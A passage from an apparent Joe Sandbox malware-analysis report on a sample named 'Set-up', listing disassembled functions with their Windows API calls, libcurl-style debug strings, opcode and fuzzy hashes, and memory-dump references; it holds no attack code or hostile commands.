                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                • API String ID: 1798382672-2691795271
                                • Opcode ID: a050023e08f69475f2fd7b387fbabc03b88b338f8898877d35b5630c6d71a0a1
                                • Instruction ID: 4b9e6c70ecca8dc6f2a9a222c59a17cd0a6cc8a3527cb97a6c6d4fbefa4072a7
                                • Opcode Fuzzy Hash: a050023e08f69475f2fd7b387fbabc03b88b338f8898877d35b5630c6d71a0a1
                                • Instruction Fuzzy Hash: 6A51D174A00305AFD714DF24C881FABB7A5FF85314F188629FD588B2A2E770E991CB91
                                Function 001D77B0 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON
                                Download Yara Rule
                                APIs
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00711C4D,00000000,00000000,?,?,?,001D9882,?,00000000), ref: 001D77DD
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 001D77F0
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 001D7802
                                • GetLastError.KERNEL32(?,00000000), ref: 001D780E
                                • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 001D7830
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 001D7843
                                • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001D786B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: fseek$ErrorLastfclosefopenfreadftell
                                • String ID:
                                • API String ID: 1915723720-0
                                • Opcode ID: e6777305571b90a74f09108b5eee1b6bb9da1efb633f1c51af371067a868bdd6
                                • Instruction ID: 6b5610889786187682b8a0e2e11c4470ed13125514b148553746d7f8503f650f
                                • Opcode Fuzzy Hash: e6777305571b90a74f09108b5eee1b6bb9da1efb633f1c51af371067a868bdd6
                                • Instruction Fuzzy Hash: A211D6E1E0931067FF2125265C4AB7B3948DB91369F18043EFD05D63C2FB29D804D1B6
                                Function 0014A150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78networkCOMMON
                                Download Yara Rule
                                APIs
                                • getsockname.WS2_32(?,?,00000080), ref: 0014A1C6
                                • WSAGetLastError.WS2_32 ref: 0014A1D0
                                  • Part of subcall function 0012D090: GetLastError.KERNEL32 ref: 0012D0A1
                                  • Part of subcall function 0012D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0A9
                                  • Part of subcall function 0012D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0CD
                                  • Part of subcall function 0012D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D0D7
                                  • Part of subcall function 0012D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0012D381
                                  • Part of subcall function 0012D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0012D3A2
                                  • Part of subcall function 0012D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0012D3BF
                                  • Part of subcall function 0012D090: GetLastError.KERNEL32 ref: 0012D3C9
                                  • Part of subcall function 0012D090: SetLastError.KERNEL32(00000000), ref: 0012D3D4
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A21C
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0014A220
                                Strings
                                • getsockname() failed with errno %d: %s, xrefs: 0014A1F0
                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0014A23B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                • API String ID: 2076026050-2605427207
                                • Opcode ID: 6f85b9c5a46e3dd46ae1db550165d45076942d66f8f14ae7413d8fb0d7fe0614
                                • Instruction ID: 93d2adeff9d32169fcf6f35ab2c8b98aca50af2fd79bce2736308cff26650c3d
                                • Opcode Fuzzy Hash: 6f85b9c5a46e3dd46ae1db550165d45076942d66f8f14ae7413d8fb0d7fe0614
                                • Instruction Fuzzy Hash: 55210A71844280AAF7259B18EC46FE773BCEF91328F040215FD9853161FB3269898BE2
                                Function 00117310 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON
                                Download Yara Rule
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00113BA6,?,0083C044,00111BD2), ref: 001173A6
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00113BA6,?,0083C044,00111BD2), ref: 001173CA
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00113BA6,?,0083C044,00111BD2), ref: 001173D2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: __acrt_iob_func_errnofflush
                                • String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
                                • API String ID: 4185500129-1340350808
                                • Opcode ID: 5c3433639ab0b8182779a469a7501163b3d634720d90db9b01d2c9497faabfd5
                                • Instruction ID: f85ae8e12767f31feab6a00ccaade6845e2933a0510856d599f6c2d6a68f7df2
                                • Opcode Fuzzy Hash: 5c3433639ab0b8182779a469a7501163b3d634720d90db9b01d2c9497faabfd5
                                • Instruction Fuzzy Hash: 0421CF71A09341AFD3289F15AC46E9B7BA9FF85754F05082CFC08E3391E761D84087E1
                                Function 0012D5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42networklibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 0012D65A
                                  • Part of subcall function 0012D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,0012D5FA,iphlpapi.dll), ref: 0012D699
                                  • Part of subcall function 0012D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 0012D6B5
                                  • Part of subcall function 0012D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,006ED834,?,?,0012D5FA,iphlpapi.dll), ref: 0012D6C3
                                • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 0012D60C
                                • QueryPerformanceFrequency.KERNEL32(0083C070), ref: 0012D643
                                • WSACleanup.WS2_32 ref: 0012D67C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
                                • String ID: if_nametoindex$iphlpapi.dll
                                • API String ID: 3452087986-3097795196
                                • Opcode ID: 87e76fa8a6c36045f1edfd8603a1575f9f7397e945a0cd71615b85b851e5a7fd
                                • Instruction ID: 801b94b5f4d405765e4f653c71d7ed92a3ae93daff22217749d5af5cc6e64c7a
                                • Opcode Fuzzy Hash: 87e76fa8a6c36045f1edfd8603a1575f9f7397e945a0cd71615b85b851e5a7fd
                                • Instruction Fuzzy Hash: FD01A7A49007818BF711AF78FD2B3663AA0BB65304F850568E958D52D2F778C568C752
                                Function 00638600 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 00638618
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 00638634
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 0063869F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: calloc$free
                                • String ID:
                                • API String ID: 171065143-3916222277
                                • Opcode ID: d312d63472c40b007e0335af5b5044a91c3beefbef51af98bc2be27d366a467e
                                • Instruction ID: be9da735346b14c221e1cf7f0466086c0ea5f0b6d388a6f7a26475589d311229
                                • Opcode Fuzzy Hash: d312d63472c40b007e0335af5b5044a91c3beefbef51af98bc2be27d366a467e
                                • Instruction Fuzzy Hash: D4115EB1504B018FCB20DF29C98169ABBE1EF66314F154B2DE4A59B3D1DB34DA05CBD2
                                Function 00111296 Relevance: 5.1, APIs: 4, Instructions: 80stringCOMMON
                                Download Yara Rule
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$memcpystrlen
                                • String ID:
                                • API String ID: 3553820921-0
                                • Opcode ID: f1fc1ecd4be37fd05a555f5c10ac4a933247cfe6624eeb9dd63b2f26beeba582
                                • Instruction ID: 50a0da13c9962c9cf3b44f81494c7a920cef256188638286f878ad4e59a5b283
                                • Opcode Fuzzy Hash: f1fc1ecd4be37fd05a555f5c10ac4a933247cfe6624eeb9dd63b2f26beeba582
                                • Instruction Fuzzy Hash: 783183B5A00745CFCB28CF68D9903A9BBF1FB89304F148A2EDA48A7311D735A841CF80
                                Function 001113BB Relevance: 5.1, APIs: 4, Instructions: 66stringCOMMON
                                Download Yara Rule
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$memcpystrlen
                                • String ID:
                                • API String ID: 3553820921-0
                                • Opcode ID: 191f75de1bf03741f8fe54b46433ad2a62052344d42841e4944a58871327321f
                                • Instruction ID: 460865dfb4a5581588a02d2955f001999dab11fa696d66ba9be55ffc8e6aa3d6
                                • Opcode Fuzzy Hash: 191f75de1bf03741f8fe54b46433ad2a62052344d42841e4944a58871327321f
                                • Instruction Fuzzy Hash: 552120B5904705CFCB18DF69D9902ADBBF1FB88304F11892ED948A7310E734A941CF81
                                Function 00113AB0 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(0083C044,0011208F), ref: 00113AB5
                                • ReleaseSRWLockExclusive.KERNEL32(0083C044,0083C044,0011208F), ref: 00113AD0
                                • ReleaseSRWLockExclusive.KERNEL32(0083C044), ref: 00113B02
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ExclusiveLock$Release$Acquire
                                • String ID:
                                • API String ID: 1021914862-0
                                • Opcode ID: 8b8befd3e9239604c513e2b36ecc0bdde37c2ca0e226ef04a378dd281eceb4b3
                                • Instruction ID: 2e07d9bfcb01bb6ac7c519975658cf8ba7c345f1312889852aee56e017567136
                                • Opcode Fuzzy Hash: 8b8befd3e9239604c513e2b36ecc0bdde37c2ca0e226ef04a378dd281eceb4b3
                                • Instruction Fuzzy Hash: 40E08C20600986CECE187BADBCA360B3550BFA2708F840838B114F1276EF3C88048FA6
                                Function 0011F7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167networkCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: CloseEvent
                                • String ID: multi.c
                                • API String ID: 2624557715-214371023
                                • Opcode ID: 284c34fa90d42fac2a2d0d4040cda20080045470bd697210ba9e717c4051fe2a
                                • Instruction ID: d7e51a96348e6a61958591d4d191003e329fe9830f1e23e2242bad44da2a0b67
                                • Opcode Fuzzy Hash: 284c34fa90d42fac2a2d0d4040cda20080045470bd697210ba9e717c4051fe2a
                                • Instruction Fuzzy Hash: 3F510BB5D043045BDB15AA30AC41BE736A4BF65318F08053CF88D9B293FB75E55AC7A2
                                Function 001178B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • closesocket.WS2_32(?), ref: 001178BB
                                  • Part of subcall function 001172A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 001172F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: closesocketfwrite
                                • String ID: FD %s:%d sclose(%d)
                                • API String ID: 1967222983-3116021458
                                • Opcode ID: 1acd460febad7ba7b565af545a0b3a2042a7d7b1dd3a6a9d2c37954590ce2e07
                                • Instruction ID: 9325cc2d5e0fdd9c573283693197ee7b4bc09f3d4332d4f4e00bc097ba5ae5b3
                                • Opcode Fuzzy Hash: 1acd460febad7ba7b565af545a0b3a2042a7d7b1dd3a6a9d2c37954590ce2e07
                                • Instruction Fuzzy Hash: 35D05E32A0A2306B86206A99BC48C9F7BB8DEC6F60B090968F94467340D2309C41C7E2
                                Function 001C71C0 Relevance: 3.3, APIs: 2, Instructions: 342COMMON
                                Download Yara Rule
                                APIs
                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 001C72FE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
